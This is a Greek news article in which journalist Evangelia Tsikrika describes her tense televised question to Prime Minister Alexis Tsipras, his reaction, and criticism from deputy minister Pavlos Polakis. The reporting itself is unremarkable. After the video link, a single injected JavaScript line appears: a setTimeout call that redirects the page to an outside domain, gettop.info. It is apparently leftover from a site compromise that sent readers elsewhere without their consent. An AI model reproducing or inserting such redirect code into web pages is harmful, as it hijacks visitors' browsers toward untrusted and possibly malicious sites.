Η «εξομολόγηση» της Τσικρίκα: Είπα ότι θα πω αυτό που θέλω στον πρωθυπουργό (ΒΙΝΤΕΟ)

0
11

 

Εξομολόγηση καρδιάς έκανε η δημοσιογράφος του Alpha Ευαγγελία Τσικρίκα στην εκπομπή της Τατιάνας Στεφανίδου στον τηλεοπτικό σταθμό Epsilon.

Όπως ανέφερε η δημοσιογράφος, που με την ερώτηση της στον Αλέξη Τσίπρα έγινε το πρόσωπο των ημερών: «Είχα πολύ άγχος τις προηγούμενες ημέρες γιατί ζούμε όλοι σε ένα καθεστώς μεγάλης αγωνίας. Και πριν από την συνέντευξη με έπαιρναν και συνάδελφοι μου και μου έλεγαν σε παρακαλούμε να εκφράσεις όλους μας να μεταφέρεις και τη δική μας την αγωνία μέσα από την ερώτηση. Και αισθανόμουν ένα μεγάλο βάρος να μπορέσω να μεταφέρω τις αγωνίες τους αλλά να το κάνω και μέσα από τον τρόπο μου. Αισθάνθηκα ότι λίγο υπήρχε κίνδυνος να εκτεθώ.
Αλλά από την άλλη έπρεπε αυτό που νιώθω και εγώ αλλά και οι συνάδελφοι μου και τις αγωνίες μας να τις αποτυπώσω» είπε η Ευαγγελία Τσικρίκα.

«Την ίδια μέρα πάντως δεν είχα άγχος. Είπα ότι θα πω αυτό που θέλω να πω» πρόσθεσε.

Σχετικά με την αντίδραση του πρωθυπουργού την ώρα της ερώτησης, η ίδια σημείωσε: «Κατάλαβα ότι του προξενούσε έναν εκνευρισμό και μια νευρικότητα αυτή η ερώτηση, επειδή εξέφρασα αυτό που αισθανόμουν, ήταν λογικό. Όχι δεν απόρησα με την αντίδρασή του».

Για

τις φωτογραφίες της με πολιτικούς που είδαν το φως της δημοσιότητας αλλά και την επίθεση που δέχτηκε από τον αναπληρωτή υπουργό Υγείας, Παύλο Πολάκη, η κα Τσικρίκα παρατήρησε: «Εννοείται ότι έχουμε φωτογραφίες όλοι μας εθιμοτυπικές, είναι μέρος της δουλειάς μας με όλους από όλους από το πολιτικό φάσμα. Απλά διάλεξαν αυτά για να πουν κάτι».

Στο επιχείρημα ότι «καναλάρχες βάζουν μπροστά τους εργαζόμενους», η κ. Τσικρίκα απάντησε πως κάτι τέτοιο δεν ισχύει. «Είμαστε όλοι εργαζόμενοι, στην πλειοψηφία που ζούμε από τη δουλειά μας… Δεν στέκει πουθενά αυτό το επιχείρημα».

https://youtu.be/R4LLdp1cQQA setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here